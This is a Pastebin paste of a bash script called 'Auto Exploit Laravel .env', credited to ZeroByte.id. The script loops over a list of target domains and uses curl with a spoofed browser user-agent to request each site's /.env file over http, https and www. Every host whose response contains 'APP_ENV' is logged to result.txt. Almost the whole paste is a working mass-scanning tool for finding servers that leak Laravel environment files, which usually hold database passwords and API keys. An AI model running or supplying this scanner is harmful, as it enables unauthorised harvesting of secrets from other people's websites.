API tools faq
paste
View difference between Paste ID: ryMHP2p2 and RFGHiinx
SHOW: | | - or go back to the newest paste.
1
#!/bin/bash
2
# Auto Exploit Laravel .env
3
# Coded by ZeroByte.id
4
# https://zerobyte.id/ - https://blog.zerobyte.id/
5
6
function exploitwww() {

7
	target=$s;

8
	wtp="https://www.$target";

9
	#echo $wtp

10
	w=$(timeout 5 curl -s -m 10 -A "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.75 Safari/537.36" $wtp'/.env');

11
	if [[ $w =~ 'APP_ENV' ]]; then

12
		echo "[OK] $target/.env";

13
		echo "$target/.env" >> result.txt

14
	else

15
		echo "[BAD] $target";

16
	fi

17
}

18
function exploit() {

19
	target=$s;

20
	htp="http://$target"

21
	e=$(timeout 5 curl -s -m 10 -A "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.75 Safari/537.36" $htp'/.env');

22
	if [[ $e =~ 'APP_ENV' ]]; then

23
		echo "[OK] $target/.env";

24
		echo "$target/.env" >> result.txt

25
	else

26
		echo "[BAD] $target";

27
	fi

28
}

29
function exploithttps() {

30
	target=$s;

31
	hts="https://$target"

32
	a=$(timeout 5 curl -s -m 10 -A "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.75 Safari/537.36" $hts'/.env');

33
	if [[ $a =~ 'APP_ENV' ]]; then

34
		echo "[OK] $target/.env";

35
		echo "$target/.env" >> result.txt

36
	elif [[ $a =~ 'Moved Permanently' ]]; then

37
		exploitwww $target

38
	else

39
		echo "[BAD] $target";

40
	fi

41
}

42
cat << "banner"

43
 _____              _           _         _     _

44
|__  /___ _ __ ___ | |__  _   _| |_ ___  (_) __| |

45
  / // _ \ '__/ _ \| '_ \| | | | __/ _ \ | |/ _` |

46
 / /|  __/ | | (_) | |_) | |_| | ||  __/_| | (_| |

47
/____\___|_|  \___/|_.__/ \__, |\__\___(_)_|\__,_|

48
                          |___/                  

49
-------------------------------------------------

50
-------- Laravel Environment Exploiter ----------

51
-------------------------------------------------

52
Usage : ./laravel.sh list.txt

53
54
banner

55
for s in $(cat $1); do

56
	target=$s;

57
	g=$(curl -s -m 10 -A "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.75 Safari/537.36" -w %{http_code} $target -o /dev/null);

58
	if [[ $g =~ '200' ]]; then

59
		exploit $s

60
	elif [[ $g =~ '301' ]]; then

61
		exploithttps $s

62
	else

63
		echo "[UNKNOWN] => $target"

64
	fi

65
done
        

    


            


                                


        

            



                
    

        Public Pastes
    

    
            

    

                    

        

    





    


    
    
    
    
    
    
    
    




    


    



                

            We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.             OK, I Understand
        

    
                

            

                
                    
                
            

            

                Not a member of Pastebin yet?

                Sign Up, it unlocks many cool features!